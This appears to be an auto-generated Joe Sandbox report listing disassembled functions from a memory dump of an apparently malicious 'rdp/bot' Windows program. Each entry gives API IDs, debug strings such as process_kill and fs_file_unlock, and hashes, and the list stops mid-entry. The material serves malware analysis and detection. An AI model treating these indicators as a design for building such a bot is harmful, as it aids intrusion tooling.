                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$ErrorLast
                                                                                                                                                  • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                                                                                                  • API String ID: 365566950-3085771803
                                                                                                                                                  • Opcode ID: 7242cc130f0a2a6716c48d4539f61c61cca49a426935c6e5f1a836722729b15a
                                                                                                                                                  • Instruction ID: a61f4284591f461ecc900cc708a5826c31f31df2e738979dc7a941b84336c955
                                                                                                                                                  • Opcode Fuzzy Hash: 7242cc130f0a2a6716c48d4539f61c61cca49a426935c6e5f1a836722729b15a
                                                                                                                                                  • Instruction Fuzzy Hash: 09514163A3C68B85FA31BB14E4402B9F270EF08F54FE04132D95E466D5DE2CE985D7A1
                                                                                                                                                  Function 00007FF775726263 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                                                                                                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                                                                                                  • API String ID: 497672076-1436771859
                                                                                                                                                  • Opcode ID: a9e3d4688f2cef7a7f1a8b99a33de268830b997e71251a35792dd052a4fc329f
                                                                                                                                                  • Instruction ID: b3b2ae7f712790589166d55c2729a9390d35cd3d1ab3bde972126b0cf36bc046
                                                                                                                                                  • Opcode Fuzzy Hash: a9e3d4688f2cef7a7f1a8b99a33de268830b997e71251a35792dd052a4fc329f
                                                                                                                                                  • Instruction Fuzzy Hash: E9418163F3C5C780FA34B715E840AB8E661EF58F78F908233C85E075D69E2CA64583A1
                                                                                                                                                  Function 00007FF775728008 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                                                                                                                                                  • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                                                                                                                                  • API String ID: 4155868088-3920367287
                                                                                                                                                  • Opcode ID: a410fe2675b68344c60de0e5381ea19adf8115199d6b880d561270e1d133c346
                                                                                                                                                  • Instruction ID: 59c0dc6c4b5563b0e5b764fd0236efba6d7c9a9f2004870b06d9d9bcf4a315a2
                                                                                                                                                  • Opcode Fuzzy Hash: a410fe2675b68344c60de0e5381ea19adf8115199d6b880d561270e1d133c346
                                                                                                                                                  • Instruction Fuzzy Hash: 87312F33A39B8781F620AB16E440779A361EB4CF90F948035CA8D87795DE2DED85C3A1
                                                                                                                                                  Function 00007FF775726A5C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                                                                                                                                                  • API String ID: 2776309574-2006444783
                                                                                                                                                  • Opcode ID: 3ec3a1a2160d6be2ce13506925b4cad43276911a0ebe2d886f62c5db007175f7
                                                                                                                                                  • Instruction ID: 54300531c8099f3b9e305f8dd66d5a11a9befcdd7f9d5fd1f222314f9f76b6de
                                                                                                                                                  • Opcode Fuzzy Hash: 3ec3a1a2160d6be2ce13506925b4cad43276911a0ebe2d886f62c5db007175f7
                                                                                                                                                  • Instruction Fuzzy Hash: 38313063D3868B41FA21BB15ED047B4A261FF0CB68FD48032D94C575A1EE7CA905C3E0
                                                                                                                                                  Function 00007FF775725923 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                                                  • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                                                                                                  • API String ID: 3555958901-1687387729
                                                                                                                                                  • Opcode ID: fd151222f5d4c5f7e3f4df75847713eb03ceb41bed176baa3ddcab5fe5ceaf11
                                                                                                                                                  • Instruction ID: c258f05009ad05de79966379fe6b776af0a176be1eb9f637e1b3f7b70fbbf17d
                                                                                                                                                  • Opcode Fuzzy Hash: fd151222f5d4c5f7e3f4df75847713eb03ceb41bed176baa3ddcab5fe5ceaf11
                                                                                                                                                  • Instruction Fuzzy Hash: DD613E63E3C15382FA206715A4483789270DF4AB74FE94532C8DE9F2D0DE6DAC8496F2
                                                                                                                                                  Function 00007FF775723222 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                  • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                                                                                                                                  • API String ID: 1211598281-4195011794
                                                                                                                                                  • Opcode ID: d47a2119cc9bc1ac397f32e48b0780d6e114215c35cc7dca4d040015413ce490
                                                                                                                                                  • Instruction ID: cc3c14d449437cff6b5df33758a3c4847b0eac3e79b29fa71b8a0c61e165623d
                                                                                                                                                  • Opcode Fuzzy Hash: d47a2119cc9bc1ac397f32e48b0780d6e114215c35cc7dca4d040015413ce490
                                                                                                                                                  • Instruction Fuzzy Hash: B1312B13F3C24B82FA247758A58077892A0EF4CF14FE45133C61F86292DD5EAE8596E2
                                                                                                                                                  Function 00007FF775725C44 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                                                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                                                                                                  • API String ID: 2291555494-3647951244
                                                                                                                                                  • Opcode ID: bcaff1ed5716f6aecfa22b25b58760706ceabae7ece6734b36facb5e6cad9157
                                                                                                                                                  • Instruction ID: 359694d8ca56fc255d983528c7f8ed38d7407e33c7e16c92e73ed3d81606b33d
                                                                                                                                                  • Opcode Fuzzy Hash: bcaff1ed5716f6aecfa22b25b58760706ceabae7ece6734b36facb5e6cad9157
                                                                                                                                                  • Instruction Fuzzy Hash: 00513063D3C29286FB747B119948379A260EF08FA4FD84232D91D5F2D4DE6DAC4583E1
                                                                                                                                                  Function 00007FF77572A264 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  • API String ID: 3513630032-2210897324
                                                                                                                                                  • Opcode ID: 54d700338b40c93835d650ec20271891e183ea02f12dfa7793e31885fa8fba64
                                                                                                                                                  • Instruction ID: 47855f77ce54bf51ac4156fab2030aedc779f72a04b41ba7ec0f7388f264ed63
                                                                                                                                                  • Opcode Fuzzy Hash: 54d700338b40c93835d650ec20271891e183ea02f12dfa7793e31885fa8fba64
                                                                                                                                                  • Instruction Fuzzy Hash: 1E21932363868785E211AF14E840BAAB7A1FB48B64F844032ED4C47654DF7DD985C790
                                                                                                                                                  Function 00007FF77572A824 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                                                  • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                  • API String ID: 637304234-2693646698
                                                                                                                                                  • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                                                                                                                                  • Instruction ID: bf49d17b0ea102109f21a3ed38a964d1466860d58d22eeafdf06f8f454e46675
                                                                                                                                                  • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                                                                                                                                  • Instruction Fuzzy Hash: 8A319033B39A4286EA10AF11E841569A7B1EF8DFA0F848135DD4C47364DE3CE486C3A0
                                                                                                                                                  Function 00007FF775729F70 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                                                  • API String ID: 2918714741-1991603811
                                                                                                                                                  • Opcode ID: f7dac0897dbcd847d75ce27a6a83e65b24b4f0f38bb84ca2c2760da033bbbfba
                                                                                                                                                  • Instruction ID: 6eeebc81b544ca6c939c84e71157a0166f0b8ab702a238020955ea921b18a04e
                                                                                                                                                  • Opcode Fuzzy Hash: f7dac0897dbcd847d75ce27a6a83e65b24b4f0f38bb84ca2c2760da033bbbfba
                                                                                                                                                  • Instruction Fuzzy Hash: 84216063A3868792E751AF11E940BAAB760FB48B94F844031EE4C47764DF3CE885C790
                                                                                                                                                  Function 00007FF77572255D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                                                  • Opcode ID: 21a440331428728772effc21dc4a0279eeb72096c7e54eb6c28e99ad6ae11850
                                                                                                                                                  • Instruction ID: d3d59cfbda9a798aee4acccaf14d589a765cd68cf51281f72f769f1751a87c6e
                                                                                                                                                  • Opcode Fuzzy Hash: 21a440331428728772effc21dc4a0279eeb72096c7e54eb6c28e99ad6ae11850
                                                                                                                                                  • Instruction Fuzzy Hash: 7E11D013A3C74386FA547B51A48033AB6A0EF0CF95FC44035CD4E0A295DE2FEC4582E1
                                                                                                                                                  Function 00007FF775722463 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                                                  • Opcode ID: 80c1333dd185fded43c3dd339691c40d7965e2688cfc90bbecb3e5080a5fd915
                                                                                                                                                  • Instruction ID: f3a59191ff3b54dc05b1b30b4a3a5e4cedade9982f533603541be708a116bb0f
                                                                                                                                                  • Opcode Fuzzy Hash: 80c1333dd185fded43c3dd339691c40d7965e2688cfc90bbecb3e5080a5fd915
                                                                                                                                                  • Instruction Fuzzy Hash: 75119017A3D74386FA54BB51A48033AB6A1EF5CF95FC44035CD0E0A695DE2FEC4582E1
                                                                                                                                                  Function 00007FF77572246A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                                                  • API String ID: 1211020085-2360327764
                                                                                                                                                  • Opcode ID: 3746774a27b59c9c280bac02fbb753bb78a8f3aa5dd7c421d7ebd650696af266
                                                                                                                                                  • Instruction ID: 6c91ce18bd5700e6b6649d9d1c407db78d9c4d841b7f36be83aa27c61378c50c
                                                                                                                                                  • Opcode Fuzzy Hash: 3746774a27b59c9c280bac02fbb753bb78a8f3aa5dd7c421d7ebd650696af266
                                                                                                                                                  • Instruction Fuzzy Hash: A1119013A3D74386FA54BB51A48033AB6A1EF5CF95FC44035CD0E0A695DE2FEC4582E1
                                                                                                                                                  Function 00007FF775722471 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
